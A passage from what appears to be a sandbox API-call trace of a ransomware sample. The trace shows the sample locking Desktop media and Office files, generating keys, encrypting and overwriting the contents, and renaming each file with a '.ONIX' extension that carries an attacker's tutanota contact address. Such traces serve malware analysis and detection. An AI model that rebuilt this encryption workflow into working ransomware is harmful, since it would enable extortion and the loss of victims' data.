(in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.318] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.319] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.319] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.319] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.319] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ES9SX2pu4CAmZF.mp3", dwFileAttributes=0x80) returned 1 [0120.319] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ES9SX2pu4CAmZF.mp3") returned 57 [0120.319] GetProcessHeap () returned 0x410000 [0120.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe2) returned 0x467908 [0120.319] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ES9SX2pu4CAmZF.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ES9SX2pu4CAmZF.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ES9SX2pu4CAmZF.mp3" [0120.319] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ES9SX2pu4CAmZF.mp3", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ES9SX2pu4CAmZF.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ES9SX2pu4CAmZF.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.319] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=9728) returned 1 [0120.319] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x2600 [0120.319] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.319] GetProcessHeap () returned 0x410000 [0120.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8b80 [0120.319] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.322] WriteFile (in: hFile=0x4a4, lpBuffer=0x4d8b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.323] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.324] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.325] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2600) returned 0x4dab68 [0120.325] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2600) returned 0x4dd170 [0120.325] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.325] ReadFile (in: hFile=0x4a4, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x2600, lpOverlapped=0x0) returned 1 [0120.326] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-9728, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.326] WriteFile (in: hFile=0x4a4, lpBuffer=0x4dd170*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dd170*, lpNumberOfBytesWritten=0x367f44c*=0x2600, lpOverlapped=0x0) returned 1 [0120.327] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4dab68 | out: hHeap=0x410000) returned 1 [0120.327] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4dd170 | out: hHeap=0x410000) returned 1 [0120.327] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2600, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.327] CloseHandle (hObject=0x4a4) returned 1 [0120.328] GetProcessHeap () returned 0x410000 [0120.328] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b80 | out: hHeap=0x410000) returned 1 [0120.328] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ES9SX2pu4CAmZF.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\es9sx2pu4camzf.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ES9SX2pu4CAmZF.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\es9sx2pu4camzf.mp3.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.331] GetProcessHeap () returned 0x410000 [0120.331] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.331] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.331] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.331] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0120.331] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8291c620, ftCreationTime.dwHighDateTime=0x1d5e7eb, ftLastAccessTime.dwLowDateTime=0x37622c80, ftLastAccessTime.dwHighDateTime=0x1d5e5c0, ftLastWriteTime.dwLowDateTime=0x37622c80, ftLastWriteTime.dwHighDateTime=0x1d5e5c0, nFileSizeHigh=0x0, nFileSizeLow=0x18fc6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hB7G.m4a", cAlternateFileName="")) returned 1 [0120.331] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.331] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.331] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.331] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.331] GetLastError () returned 0x0 [0120.331] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hB7G.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hb7g.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.331] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.332] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18fc6, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.332] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.332] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.332] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.332] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.333] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.333] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.333] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hB7G.m4a", dwFileAttributes=0x80) returned 1 [0120.333] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hB7G.m4a") returned 47 [0120.333] GetProcessHeap () returned 0x410000 [0120.333] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xce) returned 0x477600 [0120.333] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hB7G.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hB7G.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hB7G.m4a" [0120.333] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hB7G.m4a", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hB7G.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hB7G.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.333] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=102342) returned 1 [0120.333] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x18fc6 [0120.333] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.333] GetProcessHeap () returned 0x410000 [0120.333] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8b80 [0120.333] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.333] WriteFile (in: hFile=0x4a4, lpBuffer=0x4d8b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.336] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.337] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.338] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18fc6) returned 0xf50048 [0120.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18fc6) returned 0xf69018 [0120.339] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.339] ReadFile (in: hFile=0x4a4, lpBuffer=0xf50048, nNumberOfBytesToRead=0x18fc6, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x18fc6, lpOverlapped=0x0) returned 1 [0120.342] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-102342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.342] WriteFile (in: hFile=0x4a4, lpBuffer=0xf69018*, nNumberOfBytesToWrite=0x18fc6, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf69018*, lpNumberOfBytesWritten=0x367f44c*=0x18fc6, lpOverlapped=0x0) returned 1 [0120.344] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0120.344] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf69018 | out: hHeap=0x410000) returned 1 [0120.344] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18fc6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.344] CloseHandle (hObject=0x4a4) returned 1 [0120.348] GetProcessHeap () returned 0x410000 [0120.348] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b80 | out: hHeap=0x410000) returned 1 [0120.348] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hB7G.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hb7g.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hB7G.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hb7g.m4a.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.351] GetProcessHeap () returned 0x410000 [0120.351] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0120.351] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.351] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.351] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0120.351] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bc88a60, ftCreationTime.dwHighDateTime=0x1d5e73a, ftLastAccessTime.dwLowDateTime=0x7fad9500, ftLastAccessTime.dwHighDateTime=0x1d5e495, ftLastWriteTime.dwLowDateTime=0x7fad9500, ftLastWriteTime.dwHighDateTime=0x1d5e495, nFileSizeHigh=0x0, nFileSizeLow=0x17bdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Il1R-Cc.pptx", cAlternateFileName="IL1R-C~1.PPT")) returned 1 [0120.351] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.351] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.351] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.351] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.351] GetLastError () returned 0x0 [0120.351] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Il1R-Cc.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\il1r-cc.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.351] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.351] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x17bdc, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.351] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.352] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.352] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.352] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.352] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.352] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.353] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Il1R-Cc.pptx", dwFileAttributes=0x80) returned 1 [0120.353] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Il1R-Cc.pptx") returned 51 [0120.353] GetProcessHeap () returned 0x410000 [0120.353] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd6) returned 0x460008 [0120.353] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Il1R-Cc.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Il1R-Cc.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Il1R-Cc.pptx" [0120.353] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Il1R-Cc.pptx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Il1R-Cc.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Il1R-Cc.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.353] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=97244) returned 1 [0120.353] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x17bdc [0120.353] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.353] GetProcessHeap () returned 0x410000 [0120.353] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8b80 [0120.353] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.355] WriteFile (in: hFile=0x4a4, lpBuffer=0x4d8b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.356] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.357] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.358] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17bdc) returned 0xf50048 [0120.359] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17bdc) returned 0xf67c30 [0120.359] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.359] ReadFile (in: hFile=0x4a4, lpBuffer=0xf50048, nNumberOfBytesToRead=0x17bdc, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x17bdc, lpOverlapped=0x0) returned 1 [0120.362] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-97244, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.362] WriteFile (in: hFile=0x4a4, lpBuffer=0xf67c30*, nNumberOfBytesToWrite=0x17bdc, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf67c30*, lpNumberOfBytesWritten=0x367f44c*=0x17bdc, lpOverlapped=0x0) returned 1 [0120.364] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0120.364] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf67c30 | out: hHeap=0x410000) returned 1 [0120.364] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x17bdc, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.365] CloseHandle (hObject=0x4a4) returned 1 [0120.365] GetProcessHeap () returned 0x410000 [0120.365] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b80 | out: hHeap=0x410000) returned 1 [0120.365] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Il1R-Cc.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\il1r-cc.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Il1R-Cc.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\il1r-cc.pptx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.368] GetProcessHeap () returned 0x410000 [0120.368] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.368] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.368] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.368] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d858 | out: hHeap=0x410000) returned 1 [0120.368] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e521410, ftCreationTime.dwHighDateTime=0x1d5e282, ftLastAccessTime.dwLowDateTime=0x53ca3500, ftLastAccessTime.dwHighDateTime=0x1d5e266, ftLastWriteTime.dwLowDateTime=0x53ca3500, ftLastWriteTime.dwHighDateTime=0x1d5e266, nFileSizeHigh=0x0, nFileSizeLow=0x5e76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iMm3wfE9h dqRHKDhyw.doc", cAlternateFileName="IMM3WF~1.DOC")) returned 1 [0120.368] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.368] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.368] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.369] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.369] GetLastError () returned 0x0 [0120.369] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iMm3wfE9h dqRHKDhyw.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\imm3wfe9h dqrhkdhyw.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.369] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.369] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x5e76, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.369] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.369] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.370] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.370] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.370] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.370] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.370] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iMm3wfE9h dqRHKDhyw.doc", dwFileAttributes=0x80) returned 1 [0120.370] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iMm3wfE9h dqRHKDhyw.doc") returned 62 [0120.370] GetProcessHeap () returned 0x410000 [0120.370] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x449878 [0120.370] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iMm3wfE9h dqRHKDhyw.doc" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iMm3wfE9h dqRHKDhyw.doc") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iMm3wfE9h dqRHKDhyw.doc" [0120.370] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS 